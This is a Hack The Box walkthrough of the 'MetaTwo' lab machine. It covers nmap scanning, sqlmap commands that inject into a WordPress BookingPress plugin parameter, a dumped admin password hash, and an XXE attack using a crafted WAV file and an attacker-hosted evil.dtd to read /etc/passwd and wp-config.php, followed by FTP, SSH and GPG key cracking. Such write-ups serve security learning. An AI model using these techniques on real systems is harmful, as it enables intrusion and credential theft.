metatwo HTB walkthrough

7 min readApr 25, 2023

Hello, Today i am writing this walkthrough about how i solved this machine on htb. I will try to add all the steps i go through be it right or rabbit holes.

I want to write what should you do to solve the machine but also what mistakes I have done in the process and how i overcame it. To give you much better reading and learning experience. #letskeepitreal 😁🤓

Let’s get started with the machine, I have fired it up and ran a nmap on the IP.

This is what i got after running NMAP on the IP:

┌──(root㉿kali)-[~/HTB/metatwo]
└─# nmap 10.10.11.186 -p- — min-rate 1000 -sC -sV -oN metatwo_nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023–04–23 04:19 EDT
Nmap scan report for 10.10.11.186
Host is up (0.49s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4b44617d2102d8fec1dc927fecd79ee (RSA)
| 256 2aea2fcb23e8c529409cab866dcd4411 (ECDSA)
|_ 256 fd78c0b0e22016fa050debd83f12a4ab (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see an HTTP, SSH and FTP port open on the server.
The first thing i tried was anonymous login on the ftp server even though from the nmap output you can see there are no anonymous login allowed but it wouldn’t hurt to try.

Reaching the 80 port on the IP i found this hence i added the DNS entry on /etc/hosts file

So that I can open up the web server and find something there.

After knowing the web site we should first try to find what server or vendor it is hosted on or what version of service is running. To find that i wen to the bottom of the website. And I found out it is a WordPress Site.

If you are new or you haven’t tried any pentesting including wordpress. Then I must tell you that WordPress is very insecure in nature meaning it is very vulnerable.

Let’s enumerate more to find out any problem.

I fire up sqlmap to check for any injection in the search option.

After finding nothing here I started Gobuster and searched fo r any interesting directories on the server and boy, I hit the jackpot of directories here.

I also went ahead and run the wp scan on this as well to increase the chances of me finding a vulnerability.

I also saerched google for any kind of vulnerability then i stumbled upon this:

https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5

I got here and tried to look for something useful but it was of no use.

After finding nothing i got back to the web server and then i tried checking for any service running on wordpress. On the events page we can register and book a date for appointment.

While going through the page i found the script name

Searched for the exploit related to this.

I found a promising looking exploit here:
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

A curl command is envoked so lets envoke that and see if the xploit works

don’t forget to change the https to http and also change the nonce value or it will show auth error

After a little trial and error i got it to working.

We have found SQLI successfully now we will attack it using sqlmap to make our work easy.

I used this command in sqlmap to make it bruteforce for any attack on the parameter total_service.
sqlmap -u ‘http://metapress.htb/wp-admin/admin-ajax.php' — data ‘action=bookingpress_front_get_category_services&_wpnonce=1b5f712f30&category_id=33&total_service=’ -p total_service

but it did not work and then i tried this

sqlmap -u ‘http://metapress.htb/wp-admin/admin-ajax.php' — data ‘action=bookingpress_front_get_category_services&_wpnonce=1b5f712f30&category_id=33&total_service=-7865)’ -p total_service — dbs

$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. : admin

finally go this!!!!

After solving i got this

for manager i got the password as

I tried uploading this but it was not uploading so I tried to look up for any exploit, one tip if you ever get a wp access of any account level try to for any media upload or theme plugin or if you can change the code for a page in the file system of the server. You might end up getting a reverse shell from there. Now moving forward.

we do have a media library so lets try this

I followed the page as it suggested and I had to create a wav file which will call the evil.dtd file on my php server hosted.

then and evil.dtd file that will run the command for me. After this i opened up a PHP server on my machine

If you follow the site you can get the /etc/passwd file and read its content now to move forward you can try to look at wp-config file.

after trying the location /var/www/metapress.htb/wp-config.php i got nothing then i tried

/var/www/metapress.htb/blog/wp-config.php and i got this result

after starting php server go and upload payload wav normally and you should have it.

After getting a base 64 data i did this to convert it to normal readable fromat

we can see the password here for ftp user metapress.htb

lets try to login the ftp server using this

successfully in the ftp server

after a thousand get commands later i got this in the mailserver file of the ftp server

find the file on your own for this time I am not showing the directory for letting you try on your own

We know from the nmap result that there is no 587 port running hence I have only one choice to login in the ssh server and hope that my open sesame! works.

Finally !! we have something to celebrate !!!

Now after submitting the user flag

Firstly i checked for sudo -l but bad luck there and then i transferred to

installing linpeas.sh in the box and then I run it to look for any openings

i found a netstat output interesting

it is mysql server port though

then i saw this

and then i looked for it in the directory of jnelson

note: gpg2jhon will only work on private key so take the second key in the .keys file and run the command as shown you will get the password form there.